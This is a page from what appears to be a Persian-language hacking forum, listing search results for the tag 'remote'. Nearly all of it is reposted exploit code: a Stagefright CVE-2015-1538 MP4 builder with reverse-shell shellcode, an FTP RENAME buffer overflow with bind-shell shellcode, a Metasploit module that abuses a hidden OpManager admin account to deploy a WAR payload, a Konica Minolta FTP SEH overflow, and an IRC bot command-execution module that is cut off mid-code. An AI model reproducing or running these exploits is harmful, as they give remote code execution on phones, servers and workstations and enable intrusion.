امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'remote'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

140 نتیجه پیدا شد

  1. #!/usr/bin/env python # Joshua J. Drake (@jduck) of ZIMPERIUM zLabs # Shout outs to our friends at Optiv (formerly Accuvant Labs) # (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015 # www.zimperium.com # # Exploit for RCE Vulnerability CVE-2015-1538 #1 # Integer Overflow in the libstagefright MP4 ‘stsc’ atom handling # # Don’t forget, the output of “create_mp4” can be delivered many ways! # MMS is the most dangerous attack vector, but not the only one… # # DISCLAIMER: This exploit is for testing and educational purposes only. Any # other usage for this code is not allowed. Use at your own risk. # # “With great power comes great responsibility.” – Uncle Ben # import struct import socket # # Creates a single MP4 atom – LEN, TAG, DATA # def make_chunk(tag, data): if len(tag) != 4: raise ‘Yo! They call it “FourCC” for a reason.’ ret = struct.pack(‘>L’, len(data) + 8) ret += tag ret += data return ret # # Make an ‘stco’ atom – Sample Table Chunk Offets # def make_stco(extra=”): ret = struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mNumChunkOffsets return make_chunk(‘stco’, ret+extra) # # Make an ‘stsz’ atom – Sample Table Size # def make_stsz(extra=”): ret = struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mDefaultSampleSize ret += struct.pack(‘>L’, 0) # mNumSampleSizes return make_chunk(‘stsz’, ret+extra) # # Make an ‘stts’ atom – Sample Table Time-to-Sample # def make_stts(): ret = struct.pack(‘>L’, 0) # version ret += struct.pack(‘>L’, 0) # mTimeToSampleCount return make_chunk(‘stts’, ret) # # This creates a single Sample Table Sample-to-Chunk entry # def make_stsc_entry(start, per, desc): ret = ” ret += struct.pack(‘>L’, start + 1) ret += struct.pack(‘>L’, per) ret += struct.pack(‘>L’, desc) return ret # # Make an ‘stsc’ chunk – Sample Table Sample-to-Chunk # # If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and # cause a heap overflow. # def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False): ret = struct.pack(‘>L’, 0) # version/flags # this is the clean version… if not do_overflow: ret += struct.pack(‘>L’, num_alloc) # mNumSampleToChunkOffsets ret += ‘Z’ * (12 * num_alloc) return make_chunk(‘stsc’, ret) # now the explicit version. (trigger the bug) ret += struct.pack(‘>L’, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets # fill in the entries that will overflow the buffer for x in range(0, num_write): ret += make_stsc_entry(sp_addr, sp_addr, sp_addr) ret = make_chunk(‘stsc’, ret) # patch the data_size ret = struct.pack(‘>L’, 8 + 8 + (num_alloc * 12)) + ret[4:] return ret # # Build the ROP chain # # ROP pivot by Georg Wicherski! Thanks! # “”” (gdb) x/10i __dl_restore_core_regs 0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34 0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5} 0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5} 0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11} 0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc} “”” “”” b0001144 <__dl_mprotect>: b0001144: e92d0090 push {r4, r7} b0001148: e3a0707d mov r7, #125 ; 0x7d b000114c: ef000000 svc 0x00000000 b0001150: e8bd0090 pop {r4, r7} b0001154: e1b00000 movs r0, r0 b0001158: 512fff1e bxpl lr b000115c: ea0015cc b b0006894 <__dl_raise+0x10> “”” def build_rop(off, sp_addr, newpc_val, cb_host, cb_port): rop = ” rop += struct.pack(‘<L’, sp_addr + off + 0x10) # new sp rop += struct.pack(‘<L’, 0xb0002a98) # new lr – pop {pc} rop += struct.pack(‘<L’, 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc} rop += struct.pack(‘<L’, sp_addr & 0xfffff000) # new r0 – base address (page aligned) rop += struct.pack(‘<L’, 0x1000) # new r1 – length rop += struct.pack(‘<L’, 7) # new r2 – protection rop += struct.pack(‘<L’, 0xd000d003) # new r3 – scratch rop += struct.pack(‘<L’, 0xd000d004) # new r4 – scratch rop += struct.pack(‘<L’, 0xb0001144) # new pc – _dl_mprotect native_start = sp_addr + 0x80 rop += struct.pack(‘<L’, native_start) # address of native payload #rop += struct.pack(‘<L’, 0xfeedfed5) # top of stack… # linux/armle/shell_reverse_tcp (modified to pass env and fork/exit) buf = ” # fork buf += ‘\x02\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # continue if not parent… buf += ‘\x00\x00\x50\xe3’ buf += ‘\x02\x00\x00\x0a’ # exit parent buf += ‘\x00\x00\xa0\xe3’ buf += ‘\x01\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # setsid in child buf += ‘\x42\x70\xa0\xe3’ buf += ‘\x00\x00\x00\xef’ # socket/connect/dup2/dup2/dup2 buf += ‘\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c’ buf += ‘\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60’ buf += ‘\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0’ buf += ‘\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1’ buf += ‘\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06’ buf += ‘\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00’ buf += ‘\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0’ buf += ‘\xe3\x00\x00\x00\xef’ # execve(shell, argv, env) buf += ‘\x30\x00\x8f\xe2\x04\x40\x24\xe0’ buf += ‘\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d’ buf += ‘\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00’ buf += ‘\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00’ buf += ‘\xef\x02\x00’ # Add the connect back host/port buf += struct.pack(‘!H’, cb_port) cb_host = socket.inet_aton(cb_host) buf += struct.pack(‘=4s’, cb_host) # shell – buf += ‘/system/bin/sh\x00\x00’ # argv – buf += ‘sh\x00\x00’ # env – buf += ‘PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00’ # Add some identifiable stuff, just in case something goes awry… rop_start_off = 0x34 x = rop_start_off + len(rop) while len(rop) < 0x80 – rop_start_off: rop += struct.pack(‘<L’, 0xf0f00000+x) x += 4 # Add the native payload… rop += buf return rop # # Build an mp4 that exploits CVE-2015-1538 #1 # # We mimic meow.3gp here… # def create_mp4(sp_addr, newpc_val, cb_host, cb_port): chunks = [] # Build the MP4 header… ftyp = ‘mp42’ ftyp += struct.pack(‘>L’, 0) ftyp += ‘mp42’ ftyp += ‘isom’ chunks.append(make_chunk(‘ftyp’, ftyp)) # Note, this causes a few allocations… moov_data = ” moov_data += make_chunk(‘mvhd’, struct.pack(‘>LL’, 0, 0x41414141) + (‘B’ * 0x5c) ) # Add a minimal, verified trak to satisfy mLastTrack being set moov_data += make_chunk(‘trak’, make_chunk(‘stbl’, make_stsc(0x28, 0x28) + make_stco() + make_stsz() + make_stts() )) # Spray the heap using a large tx3g chunk (can contain binary data!) “”” 0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs 0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0 0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1 0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4 0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement 0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1 0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42> 0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase 0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr 0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address 0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6 0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it! “”” page = ” off = 0 # the offset to the next object off += 8 page += struct.pack(‘<L’, sp_addr + 8 + 16 + 8 + 12 – 28) # _vptr.RefBase (for when we smash mDataSource) page += struct.pack(‘<L’, sp_addr + off) # mRefs off += 16 page += struct.pack(‘<L’, 1) # mStrong page += struct.pack(‘<L’, 0xc0dedbad) # mWeak page += struct.pack(‘<L’, sp_addr + off) # mBase page += struct.pack(‘<L’, 16) # mFlags (dont set OBJECT_LIFETIME_MASK) off += 8 page += struct.pack(‘<L’, sp_addr + off) # the mBase _vptr.RefBase page += struct.pack(‘<L’, 0xf00dbabe) # mBase.mRefs (unused) off += 16 page += struct.pack(‘<L’, 0xc0de0000 + 0x00) # vtable entry 0 page += struct.pack(‘<L’, 0xc0de0000 + 0x04) # vtable entry 4 page += struct.pack(‘<L’, 0xc0de0000 + 0x08) # vtable entry 8 page += struct.pack(‘<L’, newpc_val) # vtable entry 12 rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port) x = len(page) while len(page) < 4096: page += struct.pack(‘<L’, 0xf0f00000+x) x += 4 off = 0x34 page = page[:off] + rop + page[off+len(rop):] spray = page * (((2*1024*1024) / len(page)) – 20) moov_data += make_chunk(‘tx3g’, spray) block = ‘A’ * 0x1c bigger = ‘B’ * 0x40 udta = make_chunk(‘udta’, make_chunk(‘meta’, struct.pack(‘>L’, 0) + make_chunk(‘ilst’, make_chunk(‘cpil’, make_chunk(‘data’, struct.pack(‘>LL’, 21, 0) + ‘A’)) + make_chunk(‘trkn’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABBBB’)) + make_chunk(‘disk’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABB’)) + make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 + make_chunk(‘\xa9alb’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘aART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9nam’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) + make_chunk(‘gnre’, make_chunk(‘data’, struct.pack(‘>LL’, 1, 0) + block)) + make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 + make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) + make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) + make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger))) ) ) moov_data += udta # Make the nasty trak tkhd1 = ”.join([ ‘\x00’, # version ‘D’ * 3, # padding ‘E’ * (5*4), # {c,m}time, id, ??, duration ‘F’ * 0x10, # ?? struct.pack(‘>LLLLLL’, 0x10000, # a00 0, # a01 0, # dx 0, # a10 0x10000, # a11 0), # dy ‘G’ * 0x14 ]) trak1 = ” trak1 += make_chunk(‘tkhd’, tkhd1) mdhd1 = ”.join([ ‘\x00’, # version ‘D’ * 0x17, # padding ]) mdia1 = ” mdia1 += make_chunk(‘mdhd’, mdhd1) mdia1 += make_chunk(‘hdlr’, ‘F’ * 0x3a) dinf1 = ” dinf1 += make_chunk(‘dref’, ‘H’ * 0x14) minf1 = ” minf1 += make_chunk(‘smhd’, ‘G’ * 0x08) minf1 += make_chunk(‘dinf’, dinf1) # Build the nasty sample table to trigger the vulnerability here. stbl1 = make_stsc(3, (0x1200 / 0xc) – 1, sp_addr, True) # TRIGGER # Add the stbl to the minf chunk minf1 += make_chunk(‘stbl’, stbl1) # Add the minf to the mdia chunk mdia1 += make_chunk(‘minf’, minf1) # Add the mdia to the track trak1 += make_chunk(‘mdia’, mdia1) # Add the nasty track to the moov data moov_data += make_chunk(‘trak’, trak1) # Finalize the moov chunk moov = make_chunk(‘moov’, moov_data) chunks.append(moov) # Combine outer chunks together and voila. data = ”.join(chunks) return data if __name__ == ‘__main__’: import sys import mp4 import argparse def write_file(path, content): with open(path, ‘wb’) as f: f.write(content) def addr(sval): if sval.startswith(‘0x’): return int(sval, 16) return int(sval) # The address of a fake StrongPointer object (sprayed) sp_addr = 0x41d00010 # takju @ imm76i – 2MB (via hangouts) # The address to of our ROP pivot newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs # Allow the user to override parameters parser = argparse.ArgumentParser() parser.add_argument(‘-c’, ‘–connectback-host’, dest=‘cbhost’, default=‘31.3.3.7’) parser.add_argument(‘-p’, ‘–connectback-port’, dest=‘cbport’, type=int, default=12345) parser.add_argument(‘-s’, ‘–spray-address’, dest=‘spray_addr’, type=addr, default=None) parser.add_argument(‘-r’, ‘–rop-pivot’, dest=‘rop_pivot’, type=addr, default=None) parser.add_argument(‘-o’, ‘–output-file’, dest=‘output_file’, default=‘cve-2015-1538-1.mp4’) args = parser.parse_args() if len(sys.argv) == 1: parser.print_help() sys.exit(–1) if args.spray_addr == None: args.spray_addr = sp_addr if args.rop_pivot == None: args.rop_pivot = newpc_val # Build the MP4 file… data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport) print(‘[*] Saving crafted MP4 to %s …’ % args.output_file) write_file(args.output_file, data) - See more at: https://blog.zimperium.com/the-latest-on-stagefright-cve-2015-1538-exploit-is-now-available-for-testing-purposes/#sthash.MbvoiMxd.dpuf
  2. #!/usr/bin/python # Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow # Date: 29 Aug 2015 # Exploit Author: Koby # Vendor Homepage: http://pcman.openfoundry.org/ # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # Version: 2.0.7 # Tested on: Windows XP SP3 import socket import sys # msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby # Payload size: 352 bytes shellcode = ( "\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" "\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17" "\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f" "\x59\x45\xa7\x18\xa0\x3f\xbc\x24\x98\x31\x82\x6c\x7e\x2b" "\xd2\xef\xd0\x3b\x93\x52\x1d\x1a\xb2\x54\x30\xe5\xe1\xc4" "\x59\x45\xa3\x18\x98\x2b\x38\xdf\xc3\x6f\x50\xdb\xd3\xc6" "\xe2\x18\x8b\x37\xb2\x40\x59\x5e\xab\x70\xe8\x5e\x38\xa7" "\x59\x16\x65\xa2\x2d\xbb\x72\x5c\xdf\x16\x74\xab\x32\x62" "\x45\x90\xaf\xef\x88\xee\xf6\x62\x57\xcb\x59\x4f\x97\x92" "\x01\x71\x38\x9f\x99\x9c\xeb\x8f\xd3\xc4\x38\x97\x59\x16" "\x63\x1a\x96\x33\x97\xc8\x89\x76\xea\xc9\x83\xe8\x53\xcc" "\x8d\x4d\x38\x81\x39\x9a\xee\xfb\xe1\x25\xb3\x93\xba\x60" "\xc0\xa1\x8d\x43\xdb\xdf\xa5\x31\xb4\x6c\x07\xaf\x23\x92" "\xd2\x17\x9a\x57\x86\x47\xdb\xba\x52\x7c\xb3\x6c\x07\x7d" "\xbb\xca\x82\xf5\x4e\xd3\x82\x57\xe3\xfb\x38\x18\x6c\x73" "\x2d\xc2\x24\xfb\xd0\x17\xa2\xcf\x5b\xf1\xd9\x83\x84\x40" "\xdb\x51\x09\x20\xd4\x6c\x07\x40\xdb\x24\x3b\x2f\x4c\x6c" "\x07\x40\xdb\xe7\x3e\x2c\x52\x6c\x07\x40\x24\xfb\xa7\x79" "\xfe\xf2\x2d\xc2\xdb\xf0\xbf\x73\xb3\x1a\x31\x40\xe4\xc4" "\xe3\xe1\xd9\x81\x8b\x41\x51\x6e\xb4\xd0\xf7\xb7\xee\x16" "\xb2\x1e\x96\x33\xa3\x55\xd2\x53\xe7\xc3\x84\x41\xe5\xd5" "\x84\x59\xe5\xc5\x81\x41\xdb\xea\x1e\x28\x35\x6c\x07\x9e" "\x53\xdd\x84\x51\x4c\xa3\xba\x1f\x34\x8e\xb2\xe8\x66\x28" "\x22\xa2\x11\xc5\xba\xb1\x26\x2e\x4f\xe8\x66\xaf\xd4\x6b" "\xb9\x13\x29\xf7\xc6\x96\x69\x50\xa0\xe1\xbd\x7d\xb3\xc0" "\x2d\xc2") # buffer overflow was found by fuzzing with ftp_pre_post (metasploit) # bad data is a string of 2004 "A" characters to get to a EIP overwrite # followed by the JMP ESP instruction 0x7cb48eed in SYSTEM32.dll baddata = '\x41'*2004+'\xed\x8e\xb4\x7c' # login to ftp followed by sending the bad data & payload s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.1.135',21)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('RENAME ' + baddata +'\x90'*50+ shellcode+ '\r\n') s.close()
  3. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote # It removes large object in database, shoudn't be a problem, but just in case.... Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'ManageEngine OpManager Remote Code Execution', 'Description' => %q{ This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account has a default password of "plugin" which can not be reset through the user interface. By log-in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.5 and v11.6 for Windows. }, 'License' => MSF_LICENSE, 'Author' => [ 'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module ], 'References' => [ [ 'EDB', '38174' ], ], 'Platform' => ['java'], 'Arch' => ARCH_JAVA, 'Targets' => [ ['ManageEngine OpManager v11.6', {}] ], 'Privileged' => false, 'DisclosureDate' => 'Sep 14 2015', 'DefaultTarget' => 0)) end def uri target_uri.path end def check # Check version vprint_status("#{peer} - Trying to detect ManageEngine OpManager") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'LoginPage.do') }) unless res && res.code == 200 return Exploit::CheckCode::Safe end if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/ version = $1 if Gem::Version.new(version) <= Gem::Version.new('11.6') return Exploit::CheckCode::Appears else # Patch unknown return Exploit::CheckCode::Detected end elsif res.body =~ /OpManager/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def sql_query( key, query ) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'), 'vars_get' => { 'apiKey' => key }, 'vars_post' => { 'query' => query } }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Query was not succesful!") end res end def exploit print_status("#{peer} - Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'jsp', 'Login.do'), 'vars_post' => { 'domainName' => 'NULL', 'authType' => 'localUserLogin', 'userName' => 'IntegrationUser', # Hidden user 'password' => 'plugin' # Password of hidden user } }) if res && res.code == 302 redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "") print_status("#{peer} - Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process print_status("#{peer} - Following redirection") res = send_request_cgi({ 'uri' => redirect, 'method' => 'GET' }) if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/ api_key = $1 print_status("#{peer} - Retrieved API key [ #{api_key} ]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed!") end app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '') print_status("#{peer} - Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' sql_query(api_key, sql) # Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks. sql = 'SELECT lo_create(-1)' result = sql_query(api_key, sql) if result.body =~ /lo_create":([0-9]+)}/ lo_id = $1 else fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!") end # Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc. sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))" sql_query(api_key, sql) # Export our large object id data into a WAR file sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');" sql_query(api_key, sql) # Remove our large object in the database sql = 'SELECT lo_unlink(-1)' sql_query(api_key, sql) register_file_for_cleanup("tomcat//webapps//#{app_base}.war") register_file_for_cleanup("tomcat//webapps//#{app_base}") 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end
  4. # Title: Konica Minolta FTP Utility - Remote Command Execution # Date : 20/09/2015 # Author: R-73eN # Software: Konica Minolta FTP Utility v1.0 # Tested: Windows XP SP3 # Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip # Every command is vulnerable to buffer overflow. import socket import struct shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f" shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29" shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f" shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3" shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92" shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe" shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3" shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a" shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff" shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9" shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18" shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc" shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60" shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba" shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53" shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a" shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3" shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65" banner = "" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner nSEH = "\xEB\x13\x90\x90" SEH = struct.pack('<L',0x1220401E) evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server = raw_input('Enter IP : ') s.connect((server, 21)) a = s.recv(1024) print ' [+] ' + a s.send('User ' + evil ) print '[+] https://www.infogen.al/ [+]'
  5. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'w3tw0rk / Pitbul IRC Bot Remote Code Execution', 'Description' => %q{ This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot. }, 'Author' => [ 'Jay Turla' ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '120384' ], [ 'EDB', '36652' ] ], 'Platform' => %w{ unix win }, 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 300, # According to RFC 2812, the max length message is 512, including the cr-lf 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd' } }, 'Targets' => [ [ 'w3tw0rk', { } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jun 04 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(6667), OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']), OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']), OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']) ], self.class) end def check connect res = register(sock) if res =~ /463/ || res =~ /464/ vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return Exploit::CheckCode::Unknown end res = join(sock) if !res =~ /353/ && !res =~ /366/ vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel") return Exploit::CheckCode::Unknown end quit(sock) disconnect if res =~ /auth/ && res =~ /logged in/ Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def send_msg(sock, data) sock.put(data) data = "" begin read_data = sock.get_once(-1, 1) while !read_data.nil? data << read_data read_data = sock.get_once(-1, 1) end rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") end data end def register(sock) msg = "" if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty? msg << "PASS #{datastore['IRC_PASSWORD']}\r\n" end if datastore['NICK'].length > 9 nick = rand_text_alpha(9) print_error("The nick is longer than 9 characters, using #{nick}") else nick = datastore['NICK'] end msg << "NICK 